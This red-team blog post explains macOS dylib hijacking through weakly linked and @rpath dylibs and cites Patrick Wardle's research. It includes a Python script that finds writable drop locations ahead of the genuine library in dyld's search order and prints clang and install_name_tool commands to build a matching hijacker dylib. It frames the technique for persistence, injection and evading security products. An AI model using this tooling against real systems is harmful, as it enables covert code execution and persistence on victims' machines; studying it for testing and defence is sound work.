What is dylib hijacking in macOS and how does it enable red team tradecraft?
Learn what dylib hijacking is and how to use it in red team tradecraft.
In macOS, dylib is short for dynamic library. Dylibs are the counterpart of Dynamic Link Libraries (DLLs) on Windows and shared objects (.so) on Linux.
Conceptually, dylib hijacking works like DLL search-order hijacking. When an application is launched, the dynamic loader (dyld) looks for each required library in a set of predefined locations in a fixed order and loads the first copy it finds. If a red team operator can place a malicious library at one of those locations, it is loaded and executed in the context of the application, with that application's privileges. The drop location must come earlier in the search order than the location holding the genuine library; otherwise the genuine copy is found first and the hijack never fires.
There are two ways to implement dylib hijacking on macOS:
Hijacking weak-link dylibs - A weakly linked dylib (recorded in the binary with an LC_LOAD_WEAK_DYLIB load command rather than LC_LOAD_DYLIB) does not have to be present at runtime for the process to start. If the dylib is missing, dyld leaves its symbols unresolved and the application keeps running as long as it does not call into that library; if the dylib is present, it is loaded and used normally. So if a weakly linked dylib is absent from the path the application expects, a red team operator can drop a malicious one there (or, where the path is writable, replace an existing one), and dyld will load it on the next launch.
Hijacking run-path dependent dylibs - A run-path dependent library is one whose full install path is not known when the application is linked. Its recorded name begins with the special token @rpath, which dyld substitutes at load time with each run-path search path stored in the binary (its LC_RPATH load commands), in the order they appear, until the file is found. For an application whose run-path search paths are /Applications/Sample.app/Library and /System/Library, a dependency named @rpath/sample.dylib is therefore looked up as:
/Applications/Sample.app/Library/sample.dylib
/System/Library/sample.dylib
Because the run-path list is embedded in each application, it differs from one application to the next, so every target has to be inspected individually (for example with otool -l) rather than relying on a fixed set of paths.
A red team operator who can write to a location that dyld tries before the one holding the genuine dylib (in the example above, /Applications/Sample.app/Library when the genuine copy lives under /System/Library) can drop a malicious dylib there. The earlier in the search order the drop location, the better the chances that the hijack succeeds. Two modern caveats narrow the set of targets: System Integrity Protection keeps /System/Library read-only, and an application built with the hardened runtime refuses to load a dylib that is not signed by the same Team ID unless it opts out with the com.apple.security.cs.disable-library-validation entitlement.
Two conditions must be met to hijack any dylib:
The version numbers of the malicious dylib (compatibility version and current version) must satisfy the version the application recorded in its load command, otherwise dyld rejects the library as incompatible. Copying the values from the genuine dylib is the simplest way to meet this.
The malicious dylib must export the symbols the application expects from the genuine dylib. In practice it re-exports them from the genuine library (an LC_REEXPORT_DYLIB load command pointing at the original) so the application keeps working, and runs its own code from a constructor.
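As an added example (not code from the original post and not Patrick Wardle's tooling), the script below carries out the two pieces of reasoning above on a constructed `otool -l` dump: it expands @rpath dependencies against the application's LC_RPATH entries in order, reports the first writable location ahead of the genuine library (or any writable location for a weak dylib that is absent everywhere), and prints the clang/ld64 command line that gives the hijacker the recorded version numbers and re-exports the genuine library's symbols. The Sample.app layout, the file-system state and the hijacker.c source name are assumptions; on a real target feed it the output of `otool -l <binary>` and replace the two sets with os.path.exists and os.access checks.

```python
"""Locate dylib hijack candidates from `otool -l` output (added example)."""
import os
import re
from dataclasses import dataclass

# Constructed `otool -l` excerpt (time stamp/cmdsize lines omitted) for a hypothetical
# /Applications/Sample.app: one @rpath dependency, one weakly linked absolute
# dependency, and two run-path search paths in the order the linker recorded them.
OTOOL_OUTPUT = """\
Load command 12
          cmd LC_LOAD_DYLIB
         name @rpath/sample.dylib (offset 24)
      current version 1.2.0
compatibility version 1.0.0
Load command 13
          cmd LC_LOAD_WEAK_DYLIB
         name /Library/Frameworks/Optional.framework/Versions/A/Optional (offset 24)
      current version 2.0.0
compatibility version 1.0.0
Load command 14
          cmd LC_RPATH
         path @executable_path/../../Library (offset 12)
Load command 15
          cmd LC_RPATH
         path /System/Library (offset 12)
"""
EXECUTABLE = "/Applications/Sample.app/Contents/MacOS/Sample"
# Constructed file-system state: files that exist, and directories under which the
# operator can create files. On a real host use os.path.exists / os.access instead.
PRESENT = {"/System/Library/sample.dylib"}
WRITABLE = {"/Applications/Sample.app/Library", "/Library/Frameworks"}
DEP_CMDS = ("LC_LOAD_DYLIB", "LC_LOAD_WEAK_DYLIB")

@dataclass
class Dependency:
    name: str
    weak: bool
    current_version: str = ""
    compatibility_version: str = ""

def parse_otool(text):
    """Collect dependencies (with the versions the app recorded) and LC_RPATH entries."""
    deps, rpaths, cmd = [], [], None
    for line in (raw.strip() for raw in text.splitlines()):
        if line.startswith("cmd "):
            cmd = line.split()[1]
            if cmd in DEP_CMDS:
                deps.append(Dependency("", cmd == "LC_LOAD_WEAK_DYLIB"))
        elif cmd == "LC_RPATH" and line.startswith("path "):
            rpaths.append(re.sub(r" \(offset \d+\)$", "", line[5:]))
        elif cmd in DEP_CMDS and line.startswith("name "):
            deps[-1].name = re.sub(r" \(offset \d+\)$", "", line[5:])
        elif cmd in DEP_CMDS and line.startswith("current version "):
            deps[-1].current_version = line.split()[-1]
        elif cmd in DEP_CMDS and line.startswith("compatibility version "):
            deps[-1].compatibility_version = line.split()[-1]
    return deps, rpaths

def search_order(dep_name, exe_path, rpaths):
    """Absolute paths dyld tries for one dependency, in order: @rpath expands to each
    LC_RPATH entry in load-command order (DYLD_* environment overrides are ignored)."""
    exe_dir = os.path.dirname(exe_path)
    def subst(p):  # for the main executable @loader_path equals @executable_path
        return os.path.normpath(p.replace("@executable_path", exe_dir).replace("@loader_path", exe_dir))
    if dep_name.startswith("@rpath/"):
        return [subst(os.path.join(rp, dep_name[len("@rpath/"):])) for rp in rpaths]
    return [subst(dep_name)]

def hijack_candidates(deps, rpaths, exe_path, present, writable):
    """Return (dependency, drop_path, genuine_path) for each dependency that has a
    writable location ahead of the genuine library in dyld's search order, or, for a
    weak dylib that is absent everywhere, any writable location (genuine_path None)."""
    found = []
    for dep in deps:
        order = search_order(dep.name, exe_path, rpaths)
        genuine = next((p for p in order if p in present), None)
        if genuine is None and not dep.weak:
            continue  # a missing strong dependency already stops the app from launching
        ahead = order if genuine is None else order[:order.index(genuine)]
        for p in ahead:
            d = os.path.dirname(p)
            if any(d == w or d.startswith(w + "/") for w in writable):
                found.append((dep, p, genuine))
                break
    return found

def build_commands(dep, drop_path, genuine, source="hijacker.c"):
    """macOS clang/ld64 commands for a hijacker meeting both conditions: version fields
    copied from the load command and the genuine library's symbols re-exported."""
    cmds = [f"clang -dynamiclib {source} -o {drop_path} -compatibility_version "
            f"{dep.compatibility_version} -current_version {dep.current_version}"
            + (f" -Wl,-reexport_library,{genuine}" if genuine else "")]
    if genuine:
        # ld writes the genuine library's install name into LC_REEXPORT_DYLIB; an @rpath
        # name there would resolve back to the hijacker itself, so point the entry at the
        # genuine file (assumes its install name equals the name the app links against).
        cmds.append(f"install_name_tool -change {dep.name} {genuine} {drop_path}")
    return cmds

if __name__ == "__main__":
    deps, rpaths = parse_otool(OTOOL_OUTPUT)
    for dep, drop, genuine in hijack_candidates(deps, rpaths, EXECUTABLE, PRESENT, WRITABLE):
        print(dep.name, "->", drop, *build_commands(dep, drop, genuine), sep="\n   ")
```

With the constructed state, the @rpath dependency is hijackable from /Applications/Sample.app/Library because dyld tries it before /System/Library, while the absent weak framework can be satisfied by creating it under /Library/Frameworks; neither candidate appears if the operator can write to neither directory, and the @rpath candidate disappears if the genuine library already sits in the first search location.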
Patrick Wardle, the researcher who presented this technique, released tools that automate both steps: a Dylib Hijack Scanner that finds applications vulnerable to dylib hijacking and a createHijacker script that builds a compatible hijacker dylib from a genuine one.
Red Team Notes
- dylib hijacking in macOS is similar to DLL search-order hijacking in Windows.
- The technique can be performed by hijacking weak-link dylibs or by hijacking run-path dependent dylibs.
- It abuses legitimate loader functionality, requires no modification of application binaries or operating-system files, and the payload runs inside a trusted process.
- Fun fact - Patrick Wardle is the author of the books The Art of Mac Malware, Volume 1 and Volume 2.
Follow my journey of 100 Days of Red Team on WhatsApp or Discord.
Because dylib hijacking abuses legitimate loader behaviour, modifies no application binary or operating-system file, and runs its payload inside a trusted process, it can be used for the following attacks:
Persistence
Process Injection
Bypassing Personal Security Products
Remote Attacks (bypassing Gatekeeper)
If you want to dive deep into the technical details of how dylib hijacking works, and how to safeguard against it, below is the recording of the presentation DLL Hijacking on OS X by Patrick Wardle, given at DEF CON 23 (2015). Patrick has also published a detailed paper about this technique. You can read it here.